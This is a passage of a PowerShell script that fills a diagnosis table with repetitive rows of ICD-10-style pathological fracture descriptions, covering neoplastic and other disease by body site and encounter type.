radius","Pathological fracture in neoplastic disease, left radius, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ulna and radius","Pathological fracture in neoplastic disease, unspecified ulna and radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ulna and radius","Pathological fracture in neoplastic disease, unspecified ulna and radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ulna and radius","Pathological fracture in neoplastic disease, unspecified ulna and radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ulna and radius","Pathological fracture in neoplastic disease, unspecified ulna and radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ulna and radius","Pathological fracture in neoplastic disease, unspecified ulna and radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ulna and radius","Pathological fracture in neoplastic disease, unspecified ulna and radius, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right hand","Pathological fracture in neoplastic disease, right hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right hand","Pathological fracture in neoplastic disease, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right hand","Pathological fracture in neoplastic disease, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right hand","Pathological fracture in neoplastic disease, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right hand","Pathological fracture in neoplastic disease, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right hand","Pathological fracture in neoplastic disease, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left hand","Pathological fracture in neoplastic disease, left hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left hand","Pathological fracture in neoplastic disease, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left hand","Pathological fracture in neoplastic disease, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left hand","Pathological fracture in neoplastic disease, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left hand","Pathological fracture in neoplastic disease, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left hand","Pathological fracture in neoplastic disease, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified hand","Pathological fracture in neoplastic disease, unspecified hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified hand","Pathological fracture in neoplastic disease, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified hand","Pathological fracture in neoplastic disease, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified hand","Pathological fracture in neoplastic disease, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified hand","Pathological fracture in neoplastic disease, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified hand","Pathological fracture in neoplastic disease, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, pelvis","Pathological fracture in neoplastic disease, pelvis, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, pelvis","Pathological fracture in neoplastic disease, pelvis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, pelvis","Pathological fracture in neoplastic disease, pelvis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, pelvis","Pathological fracture in neoplastic disease, pelvis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, pelvis","Pathological fracture in neoplastic disease, pelvis, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, pelvis","Pathological fracture in neoplastic disease, pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right femur","Pathological fracture in neoplastic disease, right femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right femur","Pathological fracture in neoplastic disease, right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right femur","Pathological fracture in neoplastic disease, right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right femur","Pathological fracture in neoplastic disease, right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right femur","Pathological fracture in neoplastic disease, right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right femur","Pathological fracture in neoplastic disease, right femur, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left femur","Pathological fracture in neoplastic disease, left femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left femur","Pathological fracture in neoplastic disease, left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left femur","Pathological fracture in neoplastic disease, left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left femur","Pathological fracture in neoplastic disease, left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left femur","Pathological fracture in neoplastic disease, left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left femur","Pathological fracture in neoplastic disease, left femur, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified femur","Pathological fracture in neoplastic disease, unspecified femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified femur","Pathological fracture in neoplastic disease, unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified femur","Pathological fracture in neoplastic disease, unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified femur","Pathological fracture in neoplastic disease, unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified femur","Pathological fracture in neoplastic disease, unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified femur","Pathological fracture in neoplastic disease, unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, hip, unspecified","Pathological fracture in neoplastic disease, hip, unspecified, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, hip, unspecified","Pathological fracture in neoplastic disease, hip, unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, hip, unspecified","Pathological fracture in neoplastic disease, hip, unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, hip, unspecified","Pathological fracture in neoplastic disease, hip, unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, hip, unspecified","Pathological fracture in neoplastic disease, hip, unspecified, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, hip, unspecified","Pathological fracture in neoplastic disease, hip, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right tibia","Pathological fracture in neoplastic disease, right tibia, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right tibia","Pathological fracture in neoplastic disease, right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right tibia","Pathological fracture in neoplastic disease, right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right tibia","Pathological fracture in neoplastic disease, right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right tibia","Pathological fracture in neoplastic disease, right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right tibia","Pathological fracture in neoplastic disease, right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left tibia","Pathological fracture in neoplastic disease, left tibia, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left tibia","Pathological fracture in neoplastic disease, left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left tibia","Pathological fracture in neoplastic disease, left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left tibia","Pathological fracture in neoplastic disease, left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left tibia","Pathological fracture in neoplastic disease, left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left tibia","Pathological fracture in neoplastic disease, left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right fibula","Pathological fracture in neoplastic disease, right fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right fibula","Pathological fracture in neoplastic disease, right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right fibula","Pathological fracture in neoplastic disease, right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right fibula","Pathological fracture in neoplastic disease, right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right fibula","Pathological fracture in neoplastic disease, right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right fibula","Pathological fracture in neoplastic disease, right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left fibula","Pathological fracture in neoplastic disease, left fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left fibula","Pathological fracture in neoplastic disease, left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left fibula","Pathological fracture in neoplastic disease, left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left fibula","Pathological fracture in neoplastic disease, left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left fibula","Pathological fracture in neoplastic disease, left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left fibula","Pathological fracture in neoplastic disease, left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified tibia and fibula","Pathological fracture in neoplastic disease, unspecified tibia and fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified tibia and fibula","Pathological fracture in neoplastic disease, unspecified tibia and fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified tibia and fibula","Pathological fracture in neoplastic disease, unspecified tibia and fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified tibia and fibula","Pathological fracture in neoplastic disease, unspecified tibia and fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified tibia and fibula","Pathological fracture in neoplastic disease, unspecified tibia and fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified tibia and fibula","Pathological fracture in neoplastic disease, unspecified tibia and fibula, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ankle","Pathological fracture in neoplastic disease, right ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ankle","Pathological fracture in neoplastic disease, right ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ankle","Pathological fracture in neoplastic disease, right ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ankle","Pathological fracture in neoplastic disease, right ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ankle","Pathological fracture in neoplastic disease, right ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right ankle","Pathological fracture in neoplastic disease, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ankle","Pathological fracture in neoplastic disease, left ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ankle","Pathological fracture in neoplastic disease, left ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ankle","Pathological fracture in neoplastic disease, left ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ankle","Pathological fracture in neoplastic disease, left ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ankle","Pathological fracture in neoplastic disease, left ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left ankle","Pathological fracture in neoplastic disease, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ankle","Pathological fracture in neoplastic disease, unspecified ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ankle","Pathological fracture in neoplastic disease, unspecified ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ankle","Pathological fracture in neoplastic disease, unspecified ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ankle","Pathological fracture in neoplastic disease, unspecified ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ankle","Pathological fracture in neoplastic disease, unspecified ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified ankle","Pathological fracture in neoplastic disease, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right foot","Pathological fracture in neoplastic disease, right foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right foot","Pathological fracture in neoplastic disease, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right foot","Pathological fracture in neoplastic disease, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right foot","Pathological fracture in neoplastic disease, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right foot","Pathological fracture in neoplastic disease, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, right foot","Pathological fracture in neoplastic disease, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left foot","Pathological fracture in neoplastic disease, left foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left foot","Pathological fracture in neoplastic disease, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left foot","Pathological fracture in neoplastic disease, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left foot","Pathological fracture in neoplastic disease, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left foot","Pathological fracture in neoplastic disease, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, left foot","Pathological fracture in neoplastic disease, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified foot","Pathological fracture in neoplastic disease, unspecified foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified foot","Pathological fracture in neoplastic disease, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified foot","Pathological fracture in neoplastic disease, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified foot","Pathological fracture in neoplastic disease, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified foot","Pathological fracture in neoplastic disease, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, unspecified foot","Pathological fracture in neoplastic disease, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, other specified site","Pathological fracture in neoplastic disease, other specified site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, other specified site","Pathological fracture in neoplastic disease, other specified site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, other specified site","Pathological fracture in neoplastic disease, other specified site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, other specified site","Pathological fracture in neoplastic disease, other specified site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, other specified site","Pathological fracture in neoplastic disease, other specified site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in neoplastic disease, other specified site","Pathological fracture in neoplastic disease, other specified site, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified site","Pathological fracture in other disease, unspecified site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified site","Pathological fracture in other disease, unspecified site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified site","Pathological fracture in other disease, unspecified site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified site","Pathological fracture in other disease, unspecified site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified site","Pathological fracture in other disease, unspecified site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified site","Pathological fracture in other disease, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right shoulder","Pathological fracture in other disease, right shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right shoulder","Pathological fracture in other disease, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right shoulder","Pathological fracture in other disease, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right shoulder","Pathological fracture in other disease, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right shoulder","Pathological fracture in other disease, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right shoulder","Pathological fracture in other disease, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left shoulder","Pathological fracture in other disease, left shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left shoulder","Pathological fracture in other disease, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left shoulder","Pathological fracture in other disease, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left shoulder","Pathological fracture in other disease, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left shoulder","Pathological fracture in other disease, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left shoulder","Pathological fracture in other disease, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified shoulder","Pathological fracture in other disease, unspecified shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified shoulder","Pathological fracture in other disease, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified shoulder","Pathological fracture in other disease, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified shoulder","Pathological fracture in other disease, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified shoulder","Pathological fracture in other disease, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified shoulder","Pathological fracture in other disease, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right humerus","Pathological fracture in other disease, right humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right humerus","Pathological fracture in other disease, right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right humerus","Pathological fracture in other disease, right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right humerus","Pathological fracture in other disease, right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right humerus","Pathological fracture in other disease, right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right humerus","Pathological fracture in other disease, right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left humerus","Pathological fracture in other disease, left humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left humerus","Pathological fracture in other disease, left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left humerus","Pathological fracture in other disease, left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left humerus","Pathological fracture in other disease, left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left humerus","Pathological fracture in other disease, left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left humerus","Pathological fracture in other disease, left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified humerus","Pathological fracture in other disease, unspecified humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified humerus","Pathological fracture in other disease, unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified humerus","Pathological fracture in other disease, unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified humerus","Pathological fracture in other disease, unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified humerus","Pathological fracture in other disease, unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified humerus","Pathological fracture in other disease, unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ulna","Pathological fracture in other disease, right ulna, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ulna","Pathological fracture in other disease, right ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ulna","Pathological fracture in other disease, right ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ulna","Pathological fracture in other disease, right ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ulna","Pathological fracture in other disease, right ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right ulna","Pathological fracture in other disease, right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ulna","Pathological fracture in other disease, left ulna, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ulna","Pathological fracture in other disease, left ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ulna","Pathological fracture in other disease, left ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ulna","Pathological fracture in other disease, left ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ulna","Pathological fracture in other disease, left ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left ulna","Pathological fracture in other disease, left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right radius","Pathological fracture in other disease, right radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right radius","Pathological fracture in other disease, right radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right radius","Pathological fracture in other disease, right radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right radius","Pathological fracture in other disease, right radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right radius","Pathological fracture in other disease, right radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right radius","Pathological fracture in other disease, right radius, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left radius","Pathological fracture in other disease, left radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left radius","Pathological fracture in other disease, left radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left radius","Pathological fracture in other disease, left radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left radius","Pathological fracture in other disease, left radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left radius","Pathological fracture in other disease, left radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, left radius","Pathological fracture in other disease, left radius, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ulna and radius","Pathological fracture in other disease, unspecified ulna and radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ulna and radius","Pathological fracture in other disease, unspecified ulna and radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ulna and radius","Pathological fracture in other disease, unspecified ulna and radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ulna and radius","Pathological fracture in other disease, unspecified ulna and radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ulna and radius","Pathological fracture in other disease, unspecified ulna and radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, unspecified ulna and radius","Pathological fracture in other disease, unspecified ulna and radius, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right hand","Pathological fracture in other disease, right hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right hand","Pathological fracture in other disease, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture in other disease, right 